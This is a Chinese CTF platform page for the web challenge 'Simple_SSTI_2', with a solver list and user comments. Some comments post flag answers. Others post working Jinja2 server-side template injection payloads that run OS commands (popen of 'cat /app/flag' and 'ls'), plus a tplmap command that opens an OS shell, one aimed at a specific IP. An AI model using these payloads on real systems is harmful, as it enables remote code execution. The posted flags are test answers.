Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16545
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
薄言. 攻破了该题 1天前
Zfc 攻破了该题 1天前
周文君 攻破了该题 2天前
杰哥 攻破了该题 3天前
zhaoguanjei 攻破了该题 4天前
tqlhg 攻破了该题 4天前
GrantFly 攻破了该题 6天前
yezhongyu 攻破了该题 6天前
heting 攻破了该题 6天前
y-123456 攻破了该题 7天前
271199@ 攻破了该题 8天前
dacming9527 攻破了该题 8天前
ggtom 攻破了该题 9天前
1586905095 攻破了该题 9天前
serena7780 攻破了该题 12天前
CTF-大王 攻破了该题 16天前
Ahri 攻破了该题 16天前
奥特曼 攻破了该题 17天前
SQZ 攻破了该题 17天前
评论
w_w 3年前
举报
flag{4d350209abc2ff2ab9347b0dfbe83dc7}
zhuzhu90 3年前
举报
flag{8e89d8c2793a6fec303fb2c62ff71d39}
梦若浮生 3年前
举报
http://114.67.175.224:17803/?flag={{lipsum.__globals__.os.popen('cat /app/flag').read()}}
dodobird 3年前
举报
flag{868be7e5edab8f71e023a1e642e7aad2}
L_ergo 3年前
举报
flag{968946be81a675c24c0bef227383ba70}
shansang 3年前
举报
python3 ./tplmap.py -u http://114.67.175.224:13633/?flag --engine=Jinja2 --os-shell
热热热热热若 3年前
举报
flag{23de1e599ad6abcc6c446e355e72c807}
starrabbit 3年前
举报
也可通过tplmap工具直接获取权限
hxl223 3年前
举报
flag{23de1e599ad6abcc6c446e355e72c807}
nepw 3年前
举报
通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 通过{{ config.__c